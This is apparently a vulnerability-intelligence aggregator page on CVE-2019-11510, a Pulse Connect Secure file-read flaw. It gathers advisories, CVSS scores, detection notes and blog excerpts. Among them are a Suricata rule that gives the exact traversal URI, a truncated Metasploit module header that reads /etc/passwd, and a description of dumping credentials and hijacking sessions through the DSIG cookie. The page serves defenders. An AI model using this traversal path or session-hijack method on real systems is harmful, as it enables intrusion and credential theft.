CVE-2019-11510
published 2019-05-08CVE-2019-11510: In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a…
PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
100.00%
100.0th percentile
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | — | — |
| ivanti | pulse_connect_secure | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →CVE-2019-11510 exploitation involves sending a specially crafted URI to achieve unauthenticated arbitrary file disclosure on Pulse Connect Secure; monitor for path traversal patterns in HTTP requests targeting PCS appliances. ↗
- →Exploitation of CVE-2019-11510 can expose private keys and credentials; post-exploitation activity may include credential harvesting and use of stolen VPN credentials for initial access. ↗
- →CVE-2019-11510 has been exploited to install REvil (Sodinokibi) ransomware; detections of post-exploitation ransomware activity should be correlated with Pulse Secure VPN compromise. ↗
- →APT29 (SVR) has actively exploited CVE-2019-11510 for initial access; correlate Pulse Secure VPN exploitation with subsequent lateral movement and credential theft TTPs associated with APT29.
- →SSL decryption must be enabled on network security devices to detect exploitation of CVE-2019-11510, as the vulnerability is exploited over SSL. ↗
- →Iranian threat actors (Fox Kitten campaign) also exploited CVE-2019-11510 in a multi-year campaign targeting IT, telecom, oil and gas, aviation, government, and security sectors; broaden threat actor attribution scope when investigating exploitation. ↗
- →Check Point IPS provides detection coverage for CVE-2019-11510 under the signature 'Pulse Connect Secure File Disclosure (CVE-2019-11510)'. ↗
- ·Despite an official patch being available since disclosure, widespread exploitation of unpatched servers continued well into 2020 and 2021; patch status of Pulse Secure VPN appliances must be verified before assuming protection. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvdv3.09.9CRITICALCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6wr2-qx99-98mg: In Pulse Secure Pulse Connect Secure (PCS) before 8
ghsa_unreviewed·2022-05-24
CVE-2019-11510 [HIGH] CWE-22 GHSA-6wr2-qx99-98mg: In Pulse Secure Pulse Connect Secure (PCS) before 8
In Pulse Secure Pulse Connect Secure (PCS) before 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an authenticated attacker can upload a malicious file to write to arbitrary files, because of Insecure Permissions.
VulnCheck
Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
vulncheck·2019·CVSS 10.0
CVE-2019-11510 [CRITICAL] CWE-22 Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
Ivanti Pulse Connect Secure contains an arbitrary file read vulnerability that allows an unauthenticated remote attacker with network access via HTTPS to send a specially crafted URI.
Affected: Ivanti Connect Secure and Policy Secure
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://digital.nhs.uk/cyber-alerts/2019/cc-3044; https://www.volexity.com/blog/2019/09/11/vulnerable-private-networks-corporate-vpns-exploited-in-the-wild/; https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities; https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware; https://www.clearskysec.com/wp-content/uploads/2
VulnCheck
Oracle WebLogic Server, Injection
vulncheck·2019·CVSS 9.8
CVE-2019-2725 [CRITICAL] CWE-74 Oracle WebLogic Server, Injection
Oracle WebLogic Server, Injection
Injection vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services).
Affected: Oracle WebLogic Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html; https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/; https://digital.nhs.uk/cyber-alerts/2019/cc-3044; https://www.cyber.nj.gov/threat-center/threat-profiles/ransomware-variants/sodinokibi; https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/; https://blog.talosintelligence.com/2019/05/threat-source-may-9-19.html; https://unit42.paloalt
VulnCheck
Microsoft Win32k Privilege Escalation Vulnerability
vulncheck·2018·CVSS 7.8
CVE-2018-8453 [HIGH] CWE-404 Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Windows Win32k contains a vulnerability that allows an attacker to escalate privileges.
Affected: Microsoft Win32k
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2018-Oct; https://securelist.com/zero-day-in-windows-kernel-transaction-manager-cve-2018-8611/89253/; https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/; https://digital.nhs.uk/cyber-alerts/2019/cc-3044; https://www.cyber.nj.gov/threat-center/threat-profiles/ransomware-variants/sodinokibi; https://web.archive.org/web/20220227045141/https://riskse
CISA
Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
cisa·2021-11-03·CVSS 10.0
CVE-2019-11510 [CRITICAL] CWE-22 Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
Vulnerability: Ivanti Pulse Connect Secure Arbitrary File Read Vulnerability
Affected: Ivanti Pulse Connect Secure
Ivanti Pulse Connect Secure contains an arbitrary file read vulnerability that allows an unauthenticated remote attacker with network access via HTTPS to send a specially crafted URI.
Required Action: Apply updates per vendor instructions.
Notes: Reference CISA's ED 21-03 (https://www.cisa.gov/news-events/directives/ed-21-03-mitigate-pulse-connect-secure-product-vulnerabilities) for further guidance and requirements. Note: The due date for addressing this vulnerability aligns with the requirements outlined in ED 21-03. https://nvd.nist.gov/vuln/detail/CVE-2019-11510
Remediation Due Date: 2022-05-03
Ivanti
Pulse Connect Secure Arbitrary File Read
vendor_ivanti·2021-11-03·CVSS 10.0
CVE-2019-11510 [CRITICAL] Pulse Connect Secure Arbitrary File Read
Pulse Connect Secure Arbitrary File Read
Ivanti Pulse Connect Secure contains an arbitrary file read vulnerability that allows an unauthenticated remote attacker with network access via HTTPS to send a specially crafted URI.
CVE IDs: CVE-2019-11510
Affected products: Pulse Connect Secure
This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Required Action: Apply updates per vendor instructions.
Remediation Due Date: 2022-05-03
Known to be used in ransomware campaigns.
Suricata
ET EXPLOIT Pulse Secure SSL VPN - Arbitrary File Read (CVE-2019-11510)
suricata·2019-08-22·CVSS 10.0
CVE-2019-11510 [CRITICAL] ET EXPLOIT Pulse Secure SSL VPN - Arbitrary File Read (CVE-2019-11510)
ET EXPLOIT Pulse Secure SSL VPN - Arbitrary File Read (CVE-2019-11510)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Pulse Secure SSL VPN - Arbitrary File Read (CVE-2019-11510)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/dana-na/../dana/html5acc/guacamole/../"; startswith; fast_pattern; isdataat:10,relative; reference:url,packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html; reference:cve,CVE-2019-11510; classtype:trojan-activity; sid:2027904; rev:4; metadata:affected_product Pulse_Secure, created_at 2019_08_22, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_04_13;)
Exploit-DB
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)
exploitdb·2019-08-21·CVSS 10.0
CVE-2019-11510 [CRITICAL] Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)
---
# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 8/20/2019
# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: Linux
# CVE : CVE-2019-11510
require 'msf/core'
class MetasploitModule 'Pulse Secure - System file leak',
'Description' => %q{
Pulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.
This exploit reads /etc/passwd as a proof of concept
This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
},
'References'
Nuclei
Pulse Connect Secure SSL VPN Arbitrary File Read
nuclei·CVSS 10.0
CVE-2019-11510 [CRITICAL] Pulse Connect Secure SSL VPN Arbitrary File Read
Pulse Connect Secure SSL VPN Arbitrary File Read
Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
Template:
id: CVE-2019-11510
info:
name: Pulse Connect Secure SSL VPN Arbitrary File Read
author: organiccrap
severity: critical
description: Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
impact: |
An attacker can access sensitive information stored on the system, po
Metasploit
Pulse Secure VPN Arbitrary File Disclosure
metasploit
Pulse Secure VPN Arbitrary File Disclosure
Pulse Secure VPN Arbitrary File Disclosure
This module exploits a pre-auth directory traversal in the Pulse Secure VPN server to dump an arbitrary file. Dumped files are stored in loot. If the "Automatic" action is set, plaintext and hashed credentials, as well as session IDs, will be dumped. Valid sessions can be hijacked by setting the "DSIG" browser cookie to a valid session ID. For the "Manual" action, please specify a file to dump via the "FILE" option. /etc/passwd will be dumped by default. If the "PRINT" option is set, file contents will be printed to the screen, with any unprintable characters replaced by a period. Please see related module exploit/linux/http/pulse_secure_cmd_exec for a post-auth exploit that can leverage the results from this module.
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
blogs_qualys·2025-05-08
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
## Table of Contents
Who is LockBit? How it Evolved and Operates
Monero: The Coin of the Realm
Patch or Mitigate Now: Critical CVEs Exploited by LockBit
Beyond Traditional Endpoints: Other Compromised Systems
Initial Access and Deployment
Conclusion
The LockBit ransomware gang recently suffered a significant data breach. Their dark web affiliate panels were defaced with the message “Don’t do crime CRIME IS BAD xoxo from Prague,” linking to a MySQL database dump. This archive contains a SQL file from LockBit’s affiliate panel database that includes twenty tables, notably including a ‘btc_addresses’ table with 59,975 unique bitcoin addresses and a ‘chats’ table containing over 4,400 victim negotiation messages from December 2024 to the end of April 2025.
This blog post will leverage
Bleepingcomputer
US indicts Black Kingdom ransomware admin for Microsoft Exchange attacks
blogs_bleepingcomputer·2025-05-02·CVSS 10.0
[CRITICAL] US indicts Black Kingdom ransomware admin for Microsoft Exchange attacks
## US indicts Black Kingdom ransomware admin for Microsoft Exchange attacks
## Bill Toulas
"When the malware was successful, the ransomware then created a ransom note on the victim's system that directed the victim to send $10,000 worth of Bitcoin to a cryptocurrency address controlled by a co-conspirator and to send proof of this payment to a Black Kingdom email address," reads another part of the announcement.
The U.S. DoJ highlights that Ahmed designed Black Kingdom ransomware to exploit a vulnerability in Microsoft Exchange for initial access to targeted computers.
This was first reported in March 2021 by researcher Marcus Hutchins , who discovered web shells deployed by Black Kingdom ransomware operators on Exchange servers vulnerable to ProxyLogon attacks.
The ProxyLogon flaw re
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
[CRITICAL] CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
blogs_tenable·2025-01-08·CVSS 9.0
[CRITICAL] CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
blogs_tenable·2024-02-09·CVSS 9.8
[CRITICAL] CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
blogs_tenable·2024-01-10·CVSS 8.2
[HIGH] CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Top 20 Vulnerabilities Exploited by Cyber Attackers | Qualys
#### Table of Contents
- Stats on the Top 20 Vulnerable Vendors & By-Products
- Top Twenty Most Targeted by Attackers
- TruRisk Dashboard
- Key Insights & Takeaways
- References
- Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the curre
Qualys
Qualys Top 20 Most Exploited Vulnerabilities
blogs_qualys·2023-09-04·CVSS 7.8
[HIGH] Qualys Top 20 Most Exploited Vulnerabilities
## Table of Contents
Stats on the Top 20 Vulnerable Vendors & By-Products
Top Twenty Most Targeted by Attackers
TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributors
The earlier blog posts showcased an overview of the vulnerability threat landscape that is either remotely exploited or most targeted by attackers. A quick recap – We focused on high-risk vulnerabilities that can be remotely exploited with or without authentication, and with the view on the time to CISA being down to 8 days, the most vulnerabilities targeted by threat actors, malware & ransomware.
This blog post will focus on Qualys’ Top Twenty Vulnerabilities, targeted by threat actors, malware, and ransomware, with recent trending/sightings observed in the last few years and the current year.
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
blogs_qualys·2023-07-18
Part 2: An In-Depth Look at the Latest Vulnerability Threat Landscape (Attackers’ Edition)
## Table of Contents
Top Ten Vulnerabilities Exploited by Threat Actors
Top Ten Highly Active Threat Actors
Top Ten Most Exploited Vulnerabilities by Malware
Top Ten Most Active Malware
Top Ten Vulnerabilities Exploited by Ransomware
Prioritizing Exploited Vulnerabilities with TheQualys VMDR and TruRisk
Assess Your Organizations Exposure to Risk / TruRisk Dashboard
Key Insights & Takeaways
References
Additional Contributor
The previous blog from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) of
Sentinelone
NetWalker
blogs_sentinelone·2022-11-30
NetWalker
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Sentinelone
REvil
blogs_sentinelone·2022-11-30
REvil
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Sentinelone
Maze
blogs_sentinelone·2022-11-30
Maze
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Trendmicro
Lücken in der Sicherheit von Heimarbeitsplätzen
blogs_trendmicro·2022-10-19
Lücken in der Sicherheit von Heimarbeitsplätzen
Malware
## Lücken in der Sicherheit von Heimarbeitsplätzen
Remote- und hybride Arbeitsplätze sind mittlerweile die Norm. Wir haben die Risiken und Bedrohungen dafür analysiert und geben Unternehmen ausführliche Empfehlungen, wie sie diese verteilten Arbeitspools sichern können.
By: Trend Micro Oct 19, 2022 Read time: ( words)
Save to Folio
Mittlerweile kehren Unternehmen entweder zur Arbeit im Büro zurück, stellen dauerhaft auf Fernarbeit um oder entscheiden sich für eine Kombination aus beidem. Jede dieser Lösungen hat ihre Vor- und Nachteile, doch aus Sicht der Cybersicherheit bringen die beiden letztgenannten einige Herausforderungen mit und lenken den Blick auf Sicherheitslücken.
Im Fall der hybriden und Heimarbeitsplätze (Work-From-Home, WFH) genießen Mitarbeiter nicht mehr den
Qualys
NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors
blogs_qualys·2022-10-07·CVSS 10.0
[CRITICAL] NSA Alert: Topmost CVEs Actively Exploited By People’s Republic of China State-Sponsored Cyber Actors
## Table of Contents
Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0
Identify Vulnerable Assets using Qualys Threat Protection
Recommendations & Mitigations
Contributors
On October 6, 2022, the United States National Security Agency (NSA) released a cybersecurity advisory on the Chinese government—officially known as the People’s Republic of China (PRC) states-sponsored cyber actors’ activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People’s Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurity and I
Qualys
NSA Alert: Topmost CVEs Actively Exploited By PRC Sponsored Cyber Actors | Qualys
blogs_qualys·2022-10-07
NSA Alert: Topmost CVEs Actively Exploited By PRC Sponsored Cyber Actors | Qualys
#### Table of Contents
- Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0
- Identify Vulnerable Assets using Qualys Threat Protection
- Recommendations & Mitigations
- Contributors
On October 6, 2022, the United States National Security Agency (NSA) released a cybersecurity advisory on the Chinese government—officially known as the People’s Republic of China (PRC) states-sponsored cyber actors’ activity to seek national interests. These malicious cyber activities attributed to the Chinese government targeted, and persist to target, a mixture of industries and organizations in the United States. They provide the top CVEs used since 2020 by the People’s Republic of China (PRC) states-sponsored cyber actors as evaluated by the National Security Agency (NSA), Cybersecurit
Tenable
Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
blogs_tenable·2022-10-07
Top 20 CVEs Exploited by People's Republic of China State-Sponsored Actors (AA22-279A)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Cloud Native: Virtual Patching 101
blogs_trendmicro·2022-06-16·CVSS 10.0
[CRITICAL] Cloud Native: Virtual Patching 101
Red
## Cloud Native: Virtual Patching 101
Learn about the challenges faced when implementing a vulnerability and patch management policy and how does cloud-native virtual patching can help.
By: Duane Seon Jun 16, 2022 Read time: ( words)
Save to Folio
As an enterprise’s online infrastructures become more complex — from their decentralization to the adoption of cloud , mobile , and internet-of-things (IoT) technologies — patch management has become an even more time-consuming and resource-intensive task. However, delaying or deferring the application of patches can be risky. Breaches could result in millions of dollars in financial losses , not to mention the hefty fines paid to authorities.
Besides data breaches, there’s also the looming threat of ransomware and targeted campaigns ab
Trendmicro
Cloud Native: Virtual Patching 101
blogs_trendmicro·2022-06-16·CVSS 10.0
[CRITICAL] Cloud Native: Virtual Patching 101
Network
## Cloud Native: Virtual Patching 101
Learn about the challenges faced when implementing a vulnerability and patch management policy and how does cloud-native virtual patching can help.
By: Duane Seon 2022/06/16 Read time: ( words)
Save to Folio
As an enterprise’s online infrastructures become more complex — from their decentralization to the adoption of cloud , mobile , and internet-of-things (IoT) technologies — patch management has become an even more time-consuming and resource-intensive task. However, delaying or deferring the application of patches can be risky. Breaches could result in millions of dollars in financial losses , not to mention the hefty fines paid to authorities.
Besides data breaches, there’s also the looming threat of ransomware and targeted campaigns
Trendmicro
Cloud Native: Virtual Patching 101
blogs_trendmicro·2022-06-16·CVSS 10.0
[CRITICAL] Cloud Native: Virtual Patching 101
Network
## Cloud Native: Virtual Patching 101
Learn about the challenges faced when implementing a vulnerability and patch management policy and how does cloud-native virtual patching can help.
By: Duane Seon Jun 16, 2022 Read time: ( words)
Save to Folio
As an enterprise’s online infrastructures become more complex — from their decentralization to the adoption of cloud , mobile , and internet-of-things (IoT) technologies — patch management has become an even more time-consuming and resource-intensive task. However, delaying or deferring the application of patches can be risky. Breaches could result in millions of dollars in financial losses , not to mention the hefty fines paid to authorities.
Besides data breaches, there’s also the looming threat of ransomware and targeted campaign
Trendmicro
Cloud Native: Virtual Patching 101
blogs_trendmicro·2022-06-16·CVSS 10.0
[CRITICAL] Cloud Native: Virtual Patching 101
Network
# Cloud Native: Virtual Patching 101
Learn about the challenges faced when implementing a vulnerability and patch management policy and how does cloud-native virtual patching can help.
By: Duane Seon
2022/06/16
Read time: ( words)
Save to Folio
As an enterprise’s online infrastructures become more complex — from their decentralization to the adoption of cloud, mobile, and internet-of-things (IoT) technologies — patch management has become an even more time-consuming and resource-intensive task. However, delaying or deferring the application of patches can be risky. Breaches could result in millions of dollars in financial losses, not to mention the hefty fines paid to authorities.
Besides data breaches, there’s also the looming threat of ransomware and targeted campaigns abu
Qualys
CISA Alert: Top 15 Routinely Exploited Vulnerabilities
blogs_qualys·2022-05-06·CVSS 10.0
[CRITICAL] CISA Alert: Top 15 Routinely Exploited Vulnerabilities
## Table of Contents
CISAs Top 15 Routinely Exploited Vulnerabilities of 2021
Highlights of Top Vulnerabilities Cited in CISA 2021 Report
Log4Shell Vulnerability
ProxyShell: Multiple Vulnerabilities
ProxyLogon: Multiple Vulnerabilities
How Can Qualys Help?
Getting Started
The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report’s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment.
The Cybersecurity & Infrastructure Security Agency (CISA) releases detailed alerts of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights in
Qualys
CISA Alert: Top 15 Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2022-05-06
CISA Alert: Top 15 Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- CISAs Top 15 Routinely Exploited Vulnerabilities of 2021
- Highlights of Top Vulnerabilities Cited in CISA 2021 Report
- Log4Shell Vulnerability
- ProxyShell: Multiple Vulnerabilities
- ProxyLogon: Multiple Vulnerabilities
- How Can Qualys Help?
